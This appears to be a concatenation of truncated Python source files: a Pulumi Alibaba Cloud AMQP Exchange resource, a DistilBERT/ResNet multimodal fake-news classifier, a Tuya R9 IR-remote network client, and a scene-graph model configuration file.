:param pulumi.Input[str] alternate_exchange: The alternate exchange. An alternate exchange is configured for an existing exchange. It is used to receive messages that fail to be routed to queues from the existing exchange.
:param pulumi.Input[bool] auto_delete_state: Specifies whether the Auto Delete attribute is configured. Valid values:
* true: The Auto Delete attribute is configured. If the last queue that is bound to an exchange is unbound, the exchange is automatically deleted.
* false: The Auto Delete attribute is not configured. If the last queue that is bound to an exchange is unbound, the exchange is not automatically deleted.
:param pulumi.Input[str] exchange_name: The name of the exchange. It must be 1 to 255 characters in length, and can contain only letters, digits, hyphens (-), underscores (_), periods (.), and at signs (@).
:param pulumi.Input[str] exchange_type: The type of the exchange. Valid values:
* FANOUT: An exchange of this type routes all the received messages to all the queues bound to this exchange. You can use a fanout exchange to broadcast messages.
* DIRECT: An exchange of this type routes a message to the queue whose binding key is exactly the same as the routing key of the message.
* TOPIC: This type is similar to the direct exchange type. An exchange of this type routes a message to one or more queues based on the fuzzy match or multi-condition match result between the routing key of the message and the binding keys of the current exchange.
* HEADERS: Headers Exchange uses the Headers property instead of Routing Key for routing matching.
When binding Headers Exchange and Queue, set the key-value pair of the binding property;
when sending a message to the Headers Exchange, set the message's Headers property key-value pair and use the message Headers
The message is routed to the bound Queue by comparing the attribute key-value pair and the bound attribute key-value pair.
:param pulumi.Input[str] instance_id: The ID of the instance.
:param pulumi.Input[bool] internal: Specifies whether an exchange is an internal exchange. Valid values:
* false: The exchange is not an internal exchange.
* true: The exchange is an internal exchange.
:param pulumi.Input[str] virtual_host_name: The name of virtual host where an exchange resides.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ExchangeArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a RabbitMQ (AMQP) Exchange resource.
For information about RabbitMQ (AMQP) Exchange and how to use it, see [What is Exchange](https://help.aliyun.com/).
> **NOTE:** Available in v1.128.0+.
## Example Usage
Basic Usage
```python
import pulumi
import pulumi_alicloud as alicloud
example_virtual_host = alicloud.amqp.VirtualHost("exampleVirtualHost",
instance_id="amqp-abc12345",
virtual_host_name="my-VirtualHost")
example_exchange = alicloud.amqp.Exchange("exampleExchange",
auto_delete_state=False,
exchange_name="my-Exchange",
exchange_type="DIRECT",
instance_id=example_virtual_host.instance_id,
internal=False,
virtual_host_name=example_virtual_host.virtual_host_name)
```
## Import
RabbitMQ (AMQP) Exchange can be imported using the id, e.g.
```sh
$ pulumi import alicloud:amqp/exchange:Exchange example <instance_id>:<virtual_host_name>:<exchange_name>
```
:param str resource_name: The name of the resource.
:param ExchangeArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ExchangeArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
alternate_exchange: Optional[pulumi.Input[str]] = None,
auto_delete_state: Optional[pulumi.Input[bool]] = None,
exchange_name: Optional[pulumi.Input[str]] = None,
exchange_type: Optional[pulumi.Input[str]] = None,
instance_id: Optional[pulumi.Input[str]] = None,
internal: Optional[pulumi.Input[bool]] = None,
virtual_host_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not | |
############ DISTILFND Class ############
"""
Author: <NAME>
Date: 26.09.2021
Master thesis: Explanatory detection of fake news with Deep Learning
University: University of Hagen, Hagen, Germany, Faculty for Mathematics and Computer Science
"""
# Importing needed modules
from PIL import Image, ImageFile
# Truncating images if too large
ImageFile.LOAD_TRUNCATED_IMAGES = True
# Increasing maximum image pixel size
Image.MAX_IMAGE_PIXELS = 933120000
# Importing Pytorch and transformers from HuggingFace
import torch
from torch import nn
from torchvision import models, transforms
from transformers import DistilBertTokenizer, DistilBertModel
# Importing visualization tools
import seaborn as sns
from pylab import rcParams
# Setting style of seaborn graphic visualization
sns.set(style="whitegrid", palette="muted", font_scale=1.2)
COLOR_PALETTE = ["#01BEFE", "#FFDD00", "#FF7D00", "#FF006D", "#ADFF02", "#8F00FF"]
sns.set_palette(sns.color_palette(COLOR_PALETTE))
# Setting parameter figure sizes
rcParams["figure.figsize"] = 12, 8
# Fake News subtypes in order of Fakeddit benchmark dataset labeling
CLASS_NAMES = ["True", "Satire / Parody", "False Conn.", "Impost. Content", "Man. Content", "Mis. Content"]
class DistilFND(nn.Module):
def __init__(self, num_classes):
"""
Constructor function for initializing DistilFND model
:param num_classes (array with number of classes, here length of 6):
"""
super(DistilFND, self).__init__()
# Loading DistilBertModel with pre-trained model weights from English lower case text corpus
# and assigning to title_module (Title-Feature Extractor)
self.title_module = DistilBertModel.from_pretrained("distilbert-base-uncased")
# Loading ResNet34 model with pre-trained model weights from ImageNet 2012 Benchmark dataset
# and assigning to image_module (Image-Feature Extractor)
self.image_module = models.resnet34(pretrained="imagenet")
# Loading DistilBertModel with pre-trained model weights from English lower and upper case text corpus
# and assigning to comment_module (Comment-Feature Extractor)
self.comment_module = DistilBertModel.from_pretrained("distilbert-base-cased")
# Dropout layer to randomly nullify 30% of elements of output tensors --> Useful only in model training
# Layer is still needed for loading model
self.drop = nn.Dropout(p=0.3)
# Fully connected layers (Linear layer) to reshape dimensionality of output tensors ([batch_size, num_classes])
# Reshaping title feature tensor (768,) --> (1, 6)
self.fc_title = nn.Linear(in_features=self.title_module.config.hidden_size, out_features=num_classes, bias=True)
# Reshaping comment feature tensor (768,) --> (1, 6)
self.fc_comment = nn.Linear(in_features=self.comment_module.config.hidden_size, out_features=num_classes,
bias=True)
# Reshaping image feature tensor (1, 1000) --> (1, 6)
self.fc_image = nn.Linear(in_features=1000, out_features=num_classes, bias=True)
# Final model prediction via Softmax activation function
self.softmax = nn.Softmax(dim=1)
def forward(self, title_input_ids, title_attention_mask, image, cm_input_ids, cm_attention_mask):
"""
Forward function feeds input data to layers of DistilFND model --> operational function in
order to produce a prediction for given Reddit post sample. Forward function accepts input_ids
and attention_mask from post title and comment data (generated through tokenize function) and
numeric image vector representation (generated through process_image function)
:param title_input_ids:
:param title_attention_mask:
:param image:
:param cm_input_ids:
:param cm_attention_mask:
:return:
"""
# Applying title_module onto post_title input_ids and attention_mask
# Returning title feature tensor of shape (768,)
title_last_hidden_states = self.title_module(
input_ids=title_input_ids,
attention_mask=title_attention_mask,
return_dict=False
)
# List Slicing operation applied to output of last hidden layer of DistilBert model in order to
# only return tensor representation of aggregated classification output ([CLS] token)
# and assign to pooled output variable
title_pooled_output = title_last_hidden_states[0][:, 0, :]
# Random element nullification of pooled output tensor (not applied during usage of web application)
# Layer is still needed for loading model
title_pooled_output = self.drop(title_pooled_output)
# Output from ResNet34 in shape = (1, 1000) for 1000 classes in correspondence ot ImageNet dataset
image_output = self.image_module(image)
# Random element nullification of image output tensor (not applied during usage of web application)
# Layer is still needed for loading model
image_output = self.drop(image_output)
# Applying comment_module onto post_comments input_ids and attention_mask
# Returning comment feature tensor of shape (768,)
cm_last_hidden_states = self.comment_module(
input_ids=cm_input_ids,
attention_mask=cm_attention_mask,
return_dict=False
)
# List Slicing operation applied to output of last hidden layer of DistilBert model in order to
# only return tensor representation of aggregated classification output ([CLS] token)
# and assign to pooled output variable
cm_pooled_output = cm_last_hidden_states[0][:, 0, :]
# Random element nullification of pooled output tensor (not applied during usage of web application)
# Layer is still needed for loading model
cm_pooled_output = self.drop(cm_pooled_output)
# Linear layers per title, image and comment tensor output to convert into aligned dimensionality
# Takes as input the respected title, image and comment tensors and reshapes to shape = (1, 6)
# for [one sample, 6 defined classes]
title_condensed = self.fc_title(title_pooled_output)
image_condensed = self.fc_image(image_output)
cm_condensed = self.fc_comment(cm_pooled_output)
# Now, feature vector presentation of different modalities can be merged to one feature representation
# Merging title and image output tensor to multi-modal feature representation via element-wise maximum method
fusion = torch.maximum(title_condensed, image_condensed)
# Adding comment features element-wise to respected multi-modal feature dimensions as 'booster' for
# most dominant feature representation per class, respectively per subtype of Fake News
fusion = torch.add(fusion, cm_condensed)
# Applying Softmax activation function on complete feature vector
# to return class-specific probability distribution
return self.softmax(fusion)
def load_model(self):
"""
Loading and initializing best DistilFND model with accuracy of 87,97% trained on 20% of Fakeddit dataset
:return distilfnd (loaded and trained DistilFND model variable):
"""
# Initializing DistilFND model class with CLASS_NAMES constant (length of 6 classes)
distilFND = DistilFND(len(CLASS_NAMES))
# Loading dictionary state of saved DistilFND and assigning resources to CPU
distilFND.load_state_dict(torch.load("dataset/models/distilfnd_model.pth", map_location=torch.device("cpu")))
# Returning loaded and prediction ready DistilFND model
return distilFND
def tokenize(self, post_title, post_comments):
"""
Tokenize function in order to convert raw input data into tokenized feature representations
:param post_title:
:param post_comments:
:return:
"""
# Loading corresponding DistilBertTokenizer for lower case and lower + upper case
# English text corpus --> Assigning to corresponding tokeniezr variables
title_tokenizer = DistilBertTokenizer.from_pretrained("distilbert-base-uncased")
comment_tokenizer = DistilBertTokenizer.from_pretrained("distilbert-base-cased")
# Applying title_tokenizer onto post_title input sequence via encoding_plus function
# Return is a tokenized sequence of length MAX_LEN = 80
title_encoding = title_tokenizer.encode_plus(
post_title,
# Setting max length to maximum 80 tokens per sequence
max_length=80,
# Right-side padding to max length with [PAD] token
padding="max_length",
truncation=True,
# Adding special tokens [CLS], [SEP] and [PAD]
add_special_tokens=True,
return_token_type_ids=False,
return_attention_mask=True,
# Returning PyTorch tensor
return_tensors="pt",
)
# Try-Except clause for handling exception if comment data non-existent
try:
# Applying comment_tokenizer onto comment input sequence via encoding_plus function
# Return is a tokenized sequence of length MAX_LEN = 80
comment_encoding = comment_tokenizer.encode_plus(
post_comments,
# Setting max length to maximum 80 tokens per sequence
max_length=80,
# Right-side padding to max length with [PAD] token
padding="max_length",
truncation=True,
# Adding special tokens [CLS], [SEP] and [PAD]
add_special_tokens=True,
return_token_type_ids=False,
return_attention_mask=True,
# Returning PyTorch tensors
return_tensors="pt",
)
# Handling ValueError if post has no associated comments
except ValueError:
# Initializing post_comments variable with empty string
post_comments = ""
# Applying encode_plus function to empty string
comment_encoding = comment_tokenizer.encode_plus(
post_comments,
# Setting max length to maximum 80 tokens per sequence
max_length=80,
# Right-side padding to max length with [PAD] token
padding="max_length",
truncation=True,
# Adding special tokens [CLS], [SEP] and [PAD]
add_special_tokens=True,
return_token_type_ids=False,
return_attention_mask=True,
# Returning PyTorch tensors
return_tensors="pt",
)
# Assigning input_ids and attention_mask tensors from corresponding encode_plus function
# to matching title and comment encoding variables
title_input_ids = title_encoding["input_ids"]
title_attention_mask = comment_encoding["attention_mask"]
comment_input_ids = comment_encoding["input_ids"]
comment_attention_mask = comment_encoding["attention_mask"]
# Returning tokenized encoding input_ids and attention_mask tensors for post title and comments
return title_input_ids, title_attention_mask, comment_input_ids, comment_attention_mask
def process_image(self, image):
"""
Processing function to convert raw input image into feature vector representation
:param image:
:return image (processed):
"""
# Converting raw input image into vector representation via transform function
transform = transforms.Compose([
# Resizing raw input image to size of 256
transforms.Resize(256),
# Cropping image to size of height x width = 224 x 224
transforms.CenterCrop(224),
# Converting image file to PyTorch tensor
transforms.ToTensor(),
# Applying normalization to image tensor
transforms.Normalize(
mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.255]
)
])
# If image is does not have 3 color channels, convert to RGB image
if image.mode != "RGB":
image = image.convert("RGB")
# Apply transform function on input image --> Returns 3-dimensional image tensor of shape
# [3, 224, 224] = [color_channel, height in pixel, width in pixel]
image = transform(image)
# Apply unsqueeze function to reshape tensor to 4-dimensional tensor carrying the num_images
# as first position --> [1, 3, 224, 224] = [num_images, color_channels, height, width]
image = torch.unsqueeze(image, 0)
# Return processed image which | |
'''
Created on 28 apr 2019
@author: Matteo
'''
import traceback
import struct
import asyncio
from base64 import b64decode, b64encode
import json
import time
from Crypto.Cipher import AES
import random
import string
import binascii
from hashlib import md5
from . import _LOGGER
from .const import (CD_ADD_AND_CONTINUE_WAITING, CD_RETURN_IMMEDIATELY, CD_CONTINUE_WAITING, CD_ABORT_AND_RETRY)
from .asyncio_udp import open_local_endpoint
DEFAULT_PORT = 6668
class R9:
STUDY_KEY_DICT = {
"devId": '',
"dps": {
"1": "study_key",
"10": 300,
"7": '',
# "8": keyorig
},
"t": 0,
"uid": ''
}
STUDY_KEY_COMMAND = 7
STUDY_KEY_RESP_1_COMMAND = 7
STUDY_EXIT_COMMAND = 7
STUDY_EXIT_RESP_COMMAND = 8
STUDY_COMMAND = 7
STUDY_RESP_COMMAND = 8
STUDY_DICT = {
"devId": '',
"dps": {
"1": "study",
"10": 300
},
"t": 0,
"uid": ''
}
STUDY_EXIT_DICT = {
"devId": '',
"dps": {
"1": "study_exit",
"10": 300
},
"t": 0,
"uid": ''
}
ASK_LAST_DICT = {
"devId": '',
"gwId": ''
}
ASK_LAST_COMMAND = 0x0a
ASK_LAST_RESP_COMMAND = 0x0a
PING_COMMAND = 9
PING_RESP_COMMAND = 9
PING_DICT = {
}
PROTOCOL_VERSION_BYTES = b'3.1'
LEARNED_COMMAND = 8
crc32Table = [
0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA,
0x076DC419, 0x706AF48F, 0xE963A535, 0x9E6495A3,
0x0EDB8832, 0x79DCB8A4, 0xE0D5E91E, 0x97D2D988,
0x09B64C2B, 0x7EB17CBD, 0xE7B82D07, 0x90BF1D91,
0x1DB71064, 0x6AB020F2, 0xF3B97148, 0x84BE41DE,
0x1ADAD47D, 0x6DDDE4EB, 0xF4D4B551, 0x83D385C7,
0x136C9856, 0x646BA8C0, 0xFD62F97A, 0x8A65C9EC,
0x14015C4F, 0x63066CD9, 0xFA0F3D63, 0x8D080DF5,
0x3B6E20C8, 0x4C69105E, 0xD56041E4, 0xA2677172,
0x3C03E4D1, 0x4B04D447, 0xD20D85FD, 0xA50AB56B,
0x35B5A8FA, 0x42B2986C, 0xDBBBC9D6, 0xACBCF940,
0x32D86CE3, 0x45DF5C75, 0xDCD60DCF, 0xABD13D59,
0x26D930AC, 0x51DE003A, 0xC8D75180, 0xBFD06116,
0x21B4F4B5, 0x56B3C423, 0xCFBA9599, 0xB8BDA50F,
0x2802B89E, 0x5F058808, 0xC60CD9B2, 0xB10BE924,
0x2F6F7C87, 0x58684C11, 0xC1611DAB, 0xB6662D3D,
0x76DC4190, 0x01DB7106, 0x98D220BC, 0xEFD5102A,
0x71B18589, 0x06B6B51F, 0x9FBFE4A5, 0xE8B8D433,
0x7807C9A2, 0x0F00F934, 0x9609A88E, 0xE10E9818,
0x7F6A0DBB, 0x086D3D2D, 0x91646C97, 0xE6635C01,
0x6B6B51F4, 0x1C6C6162, 0x856530D8, 0xF262004E,
0x6C0695ED, 0x1B01A57B, 0x8208F4C1, 0xF50FC457,
0x65B0D9C6, 0x12B7E950, 0x8BBEB8EA, 0xFCB9887C,
0x62DD1DDF, 0x15DA2D49, 0x8CD37CF3, 0xFBD44C65,
0x4DB26158, 0x3AB551CE, 0xA3BC0074, 0xD4BB30E2,
0x4ADFA541, 0x3DD895D7, 0xA4D1C46D, 0xD3D6F4FB,
0x4369E96A, 0x346ED9FC, 0xAD678846, 0xDA60B8D0,
0x44042D73, 0x33031DE5, 0xAA0A4C5F, 0xDD0D7CC9,
0x5005713C, 0x270241AA, 0xBE0B1010, 0xC90C2086,
0x5768B525, 0x206F85B3, 0xB966D409, 0xCE61E49F,
0x5EDEF90E, 0x29D9C998, 0xB0D09822, 0xC7D7A8B4,
0x59B33D17, 0x2EB40D81, 0xB7BD5C3B, 0xC0BA6CAD,
0xEDB88320, 0x9ABFB3B6, 0x03B6E20C, 0x74B1D29A,
0xEAD54739, 0x9DD277AF, 0x04DB2615, 0x73DC1683,
0xE3630B12, 0x94643B84, 0x0D6D6A3E, 0x7A6A5AA8,
0xE40ECF0B, 0x9309FF9D, 0x0A00AE27, 0x7D079EB1,
0xF00F9344, 0x8708A3D2, 0x1E01F268, 0x6906C2FE,
0xF762575D, 0x806567CB, 0x196C3671, 0x6E6B06E7,
0xFED41B76, 0x89D32BE0, 0x10DA7A5A, 0x67DD4ACC,
0xF9B9DF6F, 0x8EBEEFF9, 0x17B7BE43, 0x60B08ED5,
0xD6D6A3E8, 0xA1D1937E, 0x38D8C2C4, 0x4FDFF252,
0xD1BB67F1, 0xA6BC5767, 0x3FB506DD, 0x48B2364B,
0xD80D2BDA, 0xAF0A1B4C, 0x36034AF6, 0x41047A60,
0xDF60EFC3, 0xA867DF55, 0x316E8EEF, 0x4669BE79,
0xCB61B38C, 0xBC66831A, 0x256FD2A0, 0x5268E236,
0xCC0C7795, 0xBB0B4703, 0x220216B9, 0x5505262F,
0xC5BA3BBE, 0xB2BD0B28, 0x2BB45A92, 0x5CB36A04,
0xC2D7FFA7, 0xB5D0CF31, 0x2CD99E8B, 0x5BDEAE1D,
0x9B64C2B0, 0xEC63F226, 0x756AA39C, 0x026D930A,
0x9C0906A9, 0xEB0E363F, 0x72076785, 0x05005713,
0x95BF4A82, 0xE2B87A14, 0x7BB12BAE, 0x0CB61B38,
0x92D28E9B, 0xE5D5BE0D, 0x7CDCEFB7, 0x0BDBDF21,
0x86D3D2D4, 0xF1D4E242, 0x68DDB3F8, 0x1FDA836E,
0x81BE16CD, 0xF6B9265B, 0x6FB077E1, 0x18B74777,
0x88085AE6, 0xFF0F6A70, 0x66063BCA, 0x11010B5C,
0x8F659EFF, 0xF862AE69, 0x616BFFD3, 0x166CCF45,
0xA00AE278, 0xD70DD2EE, 0x4E048354, 0x3903B3C2,
0xA7672661, 0xD06016F7, 0x4969474D, 0x3E6E77DB,
0xAED16A4A, 0xD9D65ADC, 0x40DF0B66, 0x37D83BF0,
0xA9BCAE53, 0xDEBB9EC5, 0x47B2CF7F, 0x30B5FFE9,
0xBDBDF21C, 0xCABAC28A, 0x53B39330, 0x24B4A3A6,
0xBAD03605, 0xCDD70693, 0x54DE5729, 0x23D967BF,
0xB3667A2E, 0xC4614AB8, 0x5D681B02, 0x2A6F2B94,
0xB40BBE37, 0xC30C8EA1, 0x5A05DF1B, 0x2D02EF8D
]
@staticmethod
def crc32(cbytes):
crc = 0xFFFFFFFF
for b in cbytes:
crc = (crc >> 8) ^ R9.crc32Table[(crc ^ b) & 255]
return crc ^ 0xFFFFFFFF
@staticmethod
def _pad(s):
padnum = 16 - len(s) % 16
return s + padnum * chr(padnum)
@staticmethod
def _unpad(s):
return s[:-ord(s[len(s)-1:])]
@staticmethod
def check_discovery_packet(retdata, addr):
lenorig = len(retdata)
if lenorig <= 12 + 8 + 8:
_LOGGER.warning("CheckResp small len=%d", lenorig)
return CD_CONTINUE_WAITING
lenconf = struct.unpack('>I', retdata[12:16])[0] + 8 + 8
if lenconf != lenorig:
_LOGGER.warning("CheckResp len %d!=%d", lenorig, lenconf)
return CD_CONTINUE_WAITING
headerconf = struct.unpack('>I', retdata[0:4])[0]
if headerconf != 0x000055AA:
_LOGGER.warning("CheckResp header %d!=%d", 0x000055AA, headerconf)
return CD_CONTINUE_WAITING
footerconf = struct.unpack('>I', retdata[-4:])[0]
if footerconf != 0x0000AA55:
_LOGGER.warning("CheckResp footer %d!=%d", 0x0000AA55, headerconf)
return CD_CONTINUE_WAITING
crcconf = struct.unpack('>I', retdata[-8:-4])[0]
crcorig = R9.crc32(retdata[0:-8])
if crcconf != crcorig:
_LOGGER.warning("CheckResp crc %d!=%d", crcorig, crcconf)
return CD_CONTINUE_WAITING
statusconf = struct.unpack('>I', retdata[16:20])[0]
if statusconf != 0:
_LOGGER.warning("CheckResp status %d!=%d", 0, statusconf)
return CD_CONTINUE_WAITING
payload = retdata[20:-8]
try:
jsonstr = payload.decode('utf-8')
except BaseException as ex:
_LOGGER.warning("CheckResp decode %s %s", ex, binascii.hexlify(payload))
return CD_CONTINUE_WAITING
try:
jsondec = json.loads(jsonstr)
except BaseException as ex:
_LOGGER.warning("CheckResp jsonp %s %s", ex, jsonstr)
return CD_CONTINUE_WAITING
if "gwId" in jsondec:
return CD_ADD_AND_CONTINUE_WAITING, jsondec
else:
return CD_CONTINUE_WAITING
@staticmethod
async def discovery(timeout, retry=3):
"""!
Discovers Tuya devices listening to broadcast UDP messages sent to 6666 port
@param timeout: [int] time to be waited for broadcast messages
@param retry: [int] Number of retries to make if no device is found (Obtional)
@return [dict] A dict whose keys are ip addresses of Tuya devices and values are R9 objects. Please note that th found R9 devices
cannot be used before setting the correct encryption key (it is set to b'<KEY>' by default)
"""
out_data = None
_local = None
addr = ('255.255.255.255', 6666)
for _ in range(retry):
try:
_local = await open_local_endpoint(port=6666, allow_broadcast=True)
if _local:
for _ in range(retry):
out_data = await _local.protocol(None, addr, R9.check_discovery_packet, timeout, 1, True)
if out_data:
break
break
except BaseException as ex:
_LOGGER.error("Protocol[%s:%d] error: %s", *addr, str(ex))
finally:
if _local:
try:
_local.abort()
except Exception:
pass
finally:
_local = None
if _local:
try:
_local.abort()
except Exception:
pass
finally:
_local = None
rv = dict()
if out_data:
for o in out_data:
try:
it = o[0]
if it['ip'] not in rv:
obj = R9((it['ip'], DEFAULT_PORT), it['gwId'], b'0123456789abcdef')
rv[it['ip']] = obj
_LOGGER.info("Discovered %s", obj)
except BaseException as ex:
_LOGGER.error("Error in discovery process %s", ex)
return rv
def __init__(self, hp, idv, key, timeout=5, force_reconnect_s=20):
"""!
Costructs R9 remote Object
@param hp: [tuple] A tuple with host and port of the R9 remote
@param idv: [string] id of the R9 object
@param key: [string|bytes] key used to encrypt/decrypt messages from/to R9
@param timeout: [int] timeout to be used in TCP communication (optional)
@param force_reconnect_s: [int] seconds after which to force reconnection
"""
self._hp = hp
self._id = idv
if isinstance(key, str):
key = key.encode()
self._key = key
self._timeout = timeout
self._cipher = AES.new(key, mode=AES.MODE_ECB)
self._pktnum = 1
self._uid = ''.join(random.choices(string.ascii_letters + string.digits, k=20))
self._reader = None
self._writer = None
self._contime = 0
self._force_reconnect_s = force_reconnect_s
def __repr__(self):
"""!
Gets string representation of this R9 object
@return [string] string representation of this R9 object
"""
return '(%s:%d) id=%s key=%s' % (*self._hp, self._id, self._key)
async def destroy_connection(self):
"""!
Destroys the connection with the R9 device
"""
try:
if self._writer:
self._writer.close()
await self._writer.wait_closed()
except Exception:
pass
finally:
self._writer = None
self._reader = None
self._pktnum = 1
async def _init_connection(self):
try:
if self._force_reconnect_s > 0 and time.time() - self._contime > self._force_reconnect_s:
await self.destroy_connection()
if not self._writer:
_LOGGER.debug("Connecting to %s:%d (TCP)", *self._hp)
self._reader, self._writer = await asyncio.open_connection(*self._hp)
self._contime = time.time()
return True
except BaseException as ex:
_LOGGER.error("Cannot estabilish connection %s: %s", str(ex), traceback.format_exc())
await self.destroy_connection()
return False
def _generic_check_resp(self, retdata, command, command_in_dict=None, status_ok=[0]):
"""!
Checks payload of TCP packet got from R9 device. This includes Satus value check, CRC32 check, AES decryption (if needed), and MD5 check (if needed)
@param retdata: [bytes] bytes of the TCP packet payload received prom R9 device
@param command: [int] Command that is expected in the packet header
@param command_in_dict: [string|NoneType] Command that is expected in the packet JSON dps["1"]. If NoneType, no JSON is expected in packet content. If equal to '',
no dps["1"] is expected in packet JSON
@param status_ok: [list] Accepted status codes. Defaults to [0]
@return [dict|boolean] On successful check if no JSON content is present, True is returned, Otherwise the parsed dict is returned.
If check fails, False is returned
"""
lenorig = len(retdata)
if lenorig < 12 + 8 + 8:
_LOGGER.warning("CheckResp small len=%d", lenorig)
return False
lenconf = struct.unpack('>I', retdata[12:16])[0] + 8 + 8
if lenconf != lenorig:
_LOGGER.warning("CheckResp len %d!=%d", lenorig, lenconf)
return False
commandconf = struct.unpack('>I', retdata[8:12])[0]
if commandconf != command:
_LOGGER.warning("CheckResp command[%d] %d!=%d", lenorig, command, commandconf)
return False
headerconf = struct.unpack('>I', retdata[0:4])[0]
if headerconf != 0x000055AA:
_LOGGER.warning("CheckResp header %d!=%d", 0x000055AA, headerconf)
return False
footerconf = struct.unpack('>I', retdata[-4:])[0]
if footerconf != 0x0000AA55:
_LOGGER.warning("CheckResp footer %d!=%d", 0x0000AA55, headerconf)
return False
crcconf = struct.unpack('>I', retdata[-8:-4])[0]
crcorig = R9.crc32(retdata[0:-8])
if crcconf != crcorig:
_LOGGER.warning("CheckResp crc %d!=%d", crcorig, crcconf)
return False
statusconf = struct.unpack('>I', retdata[16:20])[0]
if statusconf not in status_ok:
_LOGGER.warning("CheckResp status %d!=%d", status_ok, statusconf)
return False
if command_in_dict is None:
return True
if lenorig <= 12 + 8 + 8 + 16 + len(R9.PROTOCOL_VERSION_BYTES):
_LOGGER.warning("CheckResp small2 len=%d", lenorig)
return False
protocolconf = retdata[20:23]
if protocolconf != R9.PROTOCOL_VERSION_BYTES:
_LOGGER.warning("CheckResp prot | |
"""
Configuration file!
"""
import os
import sys
from argparse import ArgumentParser
import numpy as np
ROOT_PATH = os.path.dirname(os.path.realpath(__file__))
DATA_PATH = os.path.join(ROOT_PATH, 'data')
OLD_DATA_PATH = '../Large-Scale-VRD.pytorch/data/'
CO_OCCOUR_PATH = os.path.join(DATA_PATH, 'co_occour_count.npy')
def path(fn):
return os.path.join(DATA_PATH, fn)
def stanford_path(fn):
return os.path.join(DATA_PATH, 'stanford_filtered', fn)
# =============================================================================
# Update these with where your data is stored ~~~~~~~~~~~~~~~~~~~~~~~~~
VG_IMAGES = 'data/datasets/visual-genome/VG_100K'
RCNN_CHECKPOINT_FN = path('faster_rcnn_500k.h5')
IM_DATA_FN = stanford_path('image_data.json')
VG_SGG_FN = stanford_path('VG-SGG.h5')
VG_SGG_DICT_FN = stanford_path('VG-SGG-dicts.json')
PROPOSAL_FN = stanford_path('proposals.h5')
# =============================================================================
# =============================================================================
MODES = ('sgdet', 'sgcls', 'predcls', 'objcls', 'objdet')
LOG_SOFTMAX = True
BOX_SCALE = 1024 # Scale at which we have the boxes
IM_SCALE = 592 # Our images will be resized to this res without padding
# Proposal assignments
BG_THRESH_HI = 0.5
BG_THRESH_LO = 0.0
RPN_POSITIVE_OVERLAP = 0.7
# IOU < thresh: negative example
RPN_NEGATIVE_OVERLAP = 0.3
# Max number of foreground examples
RPN_FG_FRACTION = 0.5
FG_FRACTION = 0.25
# Total number of examples
RPN_BATCHSIZE = 256
ROIS_PER_IMG = 256
REL_FG_FRACTION = 0.25
RELS_PER_IMG = 256
RELS_PER_IMG_REFINE = 64
BATCHNORM_MOMENTUM = 0.01
ANCHOR_SIZE = 16
ANCHOR_RATIOS = (0.23232838, 0.63365731, 1.28478321, 3.15089189) #(0.5, 1, 2)
ANCHOR_SCALES = (2.22152954, 4.12315647, 7.21692515, 12.60263013, 22.7102731) #(4, 8, 16, 32)
NORM_SCALE = 10.0
SAMPLING_K = 8
DIM_EMBED = 300
VAL_BATCH_SPLIT_SIZE = 256
PREDICATES_WEIGHTS = np.ones(51, dtype=np.float32)
PREDICATES_WEIGHTS[0] = 0.1
class ModelConfig(object):
"""Wrapper class for model hyperparameters."""
def __init__(self):
"""
Defaults
"""
self.ckpt = None
self.save_dir = None
self.lr = None
self.batch_size = None
self.val_size = None
self.l2 = None
self.adamwd = None
self.clip = None
self.num_gpus = None
self.num_workers = None
self.print_interval = None
self.mode = None
self.test = False
self.adam = False
self.cache = None
self.use_proposals=False
self.use_resnet=False
self.num_epochs=None
self.pooling_dim = None
self.use_obj = False
self.obj_time_step_num = None
self.obj_hidden_dim = None
self.obj_output_dim = None
self.use_obj_knowledge = False
self.obj_knowledge = None
self.use_dualResGCN_rel = False
self.dualResGCN_rel_hidden_dim = None
self.dualResGCN_rel_output_dim = None
self.use_rel_knowledge = False
self.rel_knowledge = None
self.tb_log_dir = None
self.save_rel_recall = None
self.parser = self.setup_parser()
args, unknown = self.parser.parse_known_args()
self.args = vars(args)
self.__dict__.update(self.args)
if len(self.ckpt) != 0:
self.ckpt = os.path.join(ROOT_PATH, self.ckpt)
else:
self.ckpt = None
if self.run_name != '':
self.save_dir = os.path.join(ROOT_PATH, 'checkpoints', self.run_name)
self.tb_log_dir = os.path.join(ROOT_PATH, 'summaries', self.run_name)
os.makedirs(self.save_dir, exist_ok=True)
os.makedirs(self.tb_log_dir, exist_ok=True)
else:
if self.ckpt is not None and self.ckpt.split('-')[-2].split('/')[-1] == 'vgrel':
self.save_dir = os.path.dirname(self.ckpt)
elif len(self.save_dir) == 0:
self.save_dir = None
else:
self.save_dir = os.path.join(ROOT_PATH, self.save_dir)
if not os.path.exists(self.save_dir):
os.mkdir(self.save_dir)
if len(self.tb_log_dir) != 0:
self.tb_log_dir = os.path.join(ROOT_PATH, self.tb_log_dir)
if not os.path.exists(self.tb_log_dir):
os.makedirs(self.tb_log_dir) # help make multi depth directories, such as summaries/kern_predcls
else:
self.tb_log_dir = None
if self.cache == '' and self.save_dir is not None:
self.cache = os.path.join(self.save_dir, 'caches/test_prediction.pkl')
os.makedirs(os.path.dirname(self.cache), exist_ok=True)
elif self.cache == 'none':
self.cache = None
assert self.val_size >= 0
if self.mode not in MODES:
raise ValueError("Invalid mode: mode must be in {}".format(MODES))
if self.ckpt is not None and not os.path.exists(self.ckpt):
raise ValueError("Ckpt file ({}) doesnt exist".format(self.ckpt))
log_mesg = ''
# Record the current script command
log_mesg += '~~~~~~~~ Script: ~~~~~~~\n'
log_mesg += 'python %s\n' % ' '.join(sys.argv)
log_mesg += '~~~~~~~~ Hyperparameters used: ~~~~~~~\n'
for x, y in self.__dict__.items():
log_mesg += '{} : {}\n'.format(x, y)
log_mesg += '~~~~~~~~ Unknown args: ~~~~~~~\n'
log_mesg += '{}\n'.format(unknown)
print(log_mesg)
if self.save_dir is not None:
